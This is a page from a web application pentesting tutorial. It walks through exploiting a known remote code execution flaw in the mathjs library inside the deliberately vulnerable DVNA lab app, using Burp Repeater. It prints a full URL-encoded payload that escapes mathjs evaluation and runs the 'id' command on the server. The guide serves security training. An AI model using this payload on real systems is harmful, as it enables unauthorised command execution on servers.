infosecgirls
Appsec
Appsec
  • Introduction
  • Application Details
    • VM - Pre-req
    • Import Virtual Machines
    • Access Mutillidae Web Application
  • INITIAL SETUP WITH OWASP ZAP
    • OWASP ZAP
    • Setup OWASP ZAP
    • Modes
    • Automated Scan
    • Report Generation
  • Initial Setup with Burp
    • Start Burp Suite
    • Add FoxyProxy Addon
    • Add New Proxy In FoxyProxy
    • Configure Proxy Listener
    • Install Burp's CA Certificate In Firefox
    • Getting Rid of Unnecessary Browser Traffic
  • Quick Basics
    • Disable Intercept Mode in Burp
    • Enable Intercept Mode in Burp
    • Send to Repeater
    • Send to Comparer
  • Web Application Pentesting
    • A1 - Injection
      • SQL Injection with bWAPP
      • SQL Injection in DVNA
      • Command Injection in DVNA
    • A2 - Broken Authentication
      • Broken Authentication with bWAPP
    • A3 - Sensitive Data Exposure
      • Sensitive Data Exposure - DVNA
    • A4 - XML External Entities (XXE)
      • XML External Entity (XXE) Injection - Mutillidae
      • XML External Entity (XXE) Injection - DVNA
    • A5 - Broken Access Control
      • Broken Access Control - DVNA
    • A6 - Security Misconfiguration
      • Security Misconfiguration in DVNA
      • Security Misconfiguration in Mutillidae
      • Security Misconfiguration in Security Shepherd
    • A7 - Cross-Site Scripting (XSS)
      • Reflected XSS
      • DOM XSS
      • Stored XSS - Mutillidae
      • XSS - Sending data to remote server
    • A8 - Insecure Deserialization
      • Insecure Deserialization - DVNA
    • A9 - Using Components with Known Vulnerabilities
      • Using Components with Known Vulnerabilities - DVNA
    • 10 - Insufficient Logging & Monitoring
    • References
    • About Us
  • Additional Content
    • Insecure Direct Object Reference
    • Security Misconfiguration
    • Password Guessing Attack
    • User Enumeration
      • Unauthenticated User Access
      • Create a New User
      • Authenticated User Access
      • Intruder: Set Positions
      • Intruder: Define Payload
      • Intruder: Configure Grep - Extract
      • Trigger Attack & Save Results
    • Custom Iterator
    • Null Payload
    • Request in Browser: Privilege Escalation Check
  • Burp Extenders
    • Target
    • Proxy
    • Intruder
    • Repeater
    • Sequencer
    • Decoder
    • Comparer
    • Extender
Powered by GitBook
On this page

Was this helpful?

  1. Web Application Pentesting
  2. A9 - Using Components with Known Vulnerabilities

Using Components with Known Vulnerabilities - DVNA

PreviousA9 - Using Components with Known VulnerabilitiesNext10 - Insufficient Logging & Monitoring

Last updated 4 years ago

Was this helpful?

Using Components with Known Vulnerabilities

mathjs Remote Code Execution

The version of mathjs() library used in the application has a remote code execution vulnerability that allows an attacker to run arbitrary code on the server.

The calculator implementation uses mathjs.eval to evaluate user input at

Step 1: Login to the application and navigate to /app/calc. Notice that there is a simple calculator functionality

Step 2: Enter some math expression such as 2+4 and press enter. Intercept this request using Burp

Step 3: Send the intercepted request to Burp Repeater(CTRL+R) and navigate to repeater(CTRL+SHIFT+R)

Step 4: Forward the request and notice that the expression is evaluated and application returns a HTTP 200 response

There is no input validation either, probably because it is going to be a maths equation which will contain symbols

Step 5: Modify the value of eqn in the POST request body to cos.constructor("spawn_sync = process.binding('spawn_sync'); normalizeSpawnArguments = f

OR

cos.constructor%28%22spawn_sync+%3D+process.binding%28%27spawn_sync%27%29%3B+normalizeSpawnArguments+%3D+function%28c%2Cb%2Ca%29%7Bif%28Array.isArray%28b%29%3Fb%3Db.slice%280%29%3A%28a%3Db%2Cb%3D%5B%5D%29%2Ca%3D%3D%3Dundefined%26%26%28a%3D%7B%7D%29%2Ca%3DObject.assign%28%7B%7D%2Ca%29%2Ca.shell%29%7Bconst+g%3D%5Bc%5D.concat%28b%29.join%28%27+%27%29%3Btypeof+a.shell%3D%3D%3D%27string%27%3Fc%3Da.shell%3Ac%3D%27%2Fbin%2Fsh%27%2Cb%3D%5B%27-c%27%2Cg%5D%3B%7Dtypeof+a.argv0%3D%3D%3D%27string%27%3Fb.unshift%28a.argv0%29%3Ab.unshift%28c%29%3Bvar+d%3Da.env%7C%7Cprocess.env%3Bvar+e%3D%5B%5D%3Bfor%28var+f+in+d%29e.push%28f%2B%27%3D%27%2Bd%5Bf%5D%29%3Breturn%7Bfile%3Ac%2Cargs%3Ab%2Coptions%3Aa%2CenvPairs%3Ae%7D%3B%7D%3BspawnSync+%3D+function%28%29%7Bvar+d%3DnormalizeSpawnArguments.apply%28null%2Carguments%29%3Bvar+a%3Dd.options%3Bvar+c%3Bif%28a.file%3Dd.file%2Ca.args%3Dd.args%2Ca.envPairs%3Dd.envPairs%2Ca.stdio%3D%5B%7Btype%3A%27pipe%27%2Creadable%3A%210%2Cwritable%3A%211%7D%2C%7Btype%3A%27pipe%27%2Creadable%3A%211%2Cwritable%3A%210%7D%2C%7Btype%3A%27pipe%27%2Creadable%3A%211%2Cwritable%3A%210%7D%5D%2Ca.input%29%7Bvar+g%3Da.stdio%5B0%5D%3Dutil._extend%28%7B%7D%2Ca.stdio%5B0%5D%29%3Bg.input%3Da.input%3B%7Dfor%28c%3D0%3Bc%3Ca.stdio.length%3Bc%2B%2B%29%7Bvar+e%3Da.stdio%5Bc%5D%26%26a.stdio%5Bc%5D.input%3Bif%28e%21%3Dnull%29%7Bvar+f%3Da.stdio%5Bc%5D%3Dutil._extend%28%7B%7D%2Ca.stdio%5Bc%5D%29%3BisUint8Array%28e%29%3Ff.input%3De%3Af.input%3DBuffer.from%28e%2Ca.encoding%29%3B%7D%7Dconsole.log%28a%29%3Bvar+b%3Dspawn_sync.spawn%28a%29%3Bif%28b.output%26%26a.encoding%26%26a.encoding%21%3D%3D%27buffer%27%29for%28c%3D0%3Bc%3Cb.output.length%3Bc%2B%2B%29%7Bif%28%21b.output%5Bc%5D%29continue%3Bb.output%5Bc%5D%3Db.output%5Bc%5D.toString%28a.encoding%29%3B%7Dreturn+b.stdout%3Db.output%26%26b.output%5B1%5D%2Cb.stderr%3Db.output%26%26b.output%5B2%5D%2Cb.error%26%26%28b.error%3D+b.error+%2B+%27spawnSync+%27%2Bd.file%2Cb.error.path%3Dd.file%2Cb.error.spawnargs%3Dd.args.slice%281%29%29%2Cb%3B%7D%22%29%28%29%3Bcos.constructor%28%22return+spawnSync%28%27id%27%29.output%5B1%5D%22%29%28%29.

cos.constructor%28%22spawn_sync+%3D+process.binding%28%27spawn_sync%27%29%3B+normalizeSpawnArguments+%3D+function%28c%2Cb%2Ca%29%7Bif%28Array.isArray%28b%29%3Fb%3Db.slice%280%29%3A%28a%3Db%2Cb%3D%5B%5D%29%2Ca%3D%3D%3Dundefined%26%26%28a%3D%7B%7D%29%2Ca%3DObject.assign%28%7B%7D%2Ca%29%2Ca.shell%29%7Bconst+g%3D%5Bc%5D.concat%28b%29.join%28%27+%27%29%3Btypeof+a.shell%3D%3D%3D%27string%27%3Fc%3Da.shell%3Ac%3D%27%2Fbin%2Fsh%27%2Cb%3D%5B%27-c%27%2Cg%5D%3B%7Dtypeof+a.argv0%3D%3D%3D%27string%27%3Fb.unshift%28a.argv0%29%3Ab.unshift%28c%29%3Bvar+d%3Da.env%7C%7Cprocess.env%3Bvar+e%3D%5B%5D%3Bfor%28var+f+in+d%29e.push%28f%2B%27%3D%27%2Bd%5Bf%5D%29%3Breturn%7Bfile%3Ac%2Cargs%3Ab%2Coptions%3Aa%2CenvPairs%3Ae%7D%3B%7D%3BspawnSync+%3D+function%28%29%7Bvar+d%3DnormalizeSpawnArguments.apply%28null%2Carguments%29%3Bvar+a%3Dd.options%3Bvar+c%3Bif%28a.file%3Dd.file%2Ca.args%3Dd.args%2Ca.envPairs%3Dd.envPairs%2Ca.stdio%3D%5B%7Btype%3A%27pipe%27%2Creadable%3A%210%2Cwritable%3A%211%7D%2C%7Btype%3A%27pipe%27%2Creadable%3A%211%2Cwritable%3A%210%7D%2C%7Btype%3A%27pipe%27%2Creadable%3A%211%2Cwritable%3A%210%7D%5D%2Ca.input%29%7Bvar+g%3Da.stdio%5B0%5D%3Dutil._extend%28%7B%7D%2Ca.stdio%5B0%5D%29%3Bg.input%3Da.input%3B%7Dfor%28c%3D0%3Bc%3Ca.stdio.length%3Bc%2B%2B%29%7Bvar+e%3Da.stdio%5Bc%5D%26%26a.stdio%5Bc%5D.input%3Bif%28e%21%3Dnull%29%7Bvar+f%3Da.stdio%5Bc%5D%3Dutil._extend%28%7B%7D%2Ca.stdio%5Bc%5D%29%3BisUint8Array%28e%29%3Ff.input%3De%3Af.input%3DBuffer.from%28e%2Ca.encoding%29%3B%7D%7Dconsole.log%28a%29%3Bvar+b%3Dspawn_sync.spawn%28a%29%3Bif%28b.output%26%26a.encoding%26%26a.encoding%21%3D%3D%27buffer%27%29for%28c%3D0%3Bc%3Cb.output.length%3Bc%2B%2B%29%7Bif%28%21b.output%5Bc%5D%29continue%3Bb.output%5Bc%5D%3Db.output%5Bc%5D.toString%28a.encoding%29%3B%7Dreturn+b.stdout%3Db.output%26%26b.output%5B1%5D%2Cb.stderr%3Db.output%26%26b.output%5B2%5D%2Cb.error%26%26%28b.error%3D+b.error+%2B+%27spawnSync+%27%2Bd.file%2Cb.error.path%3Dd.file%2Cb.error.spawnargs%3Dd.args.slice%281%29%29%2Cb%3B%7D%22%29%28%29%3Bcos.constructor%28%22return+spawnSync%28%27id%27%29.output%5B1%5D%22%29%28%29.

Forward the request and notice that the response is a has the output of id command executed on the remote server

https://www.npmjs.com/package/mathjs
http://192.168.56.101:9090/app/calc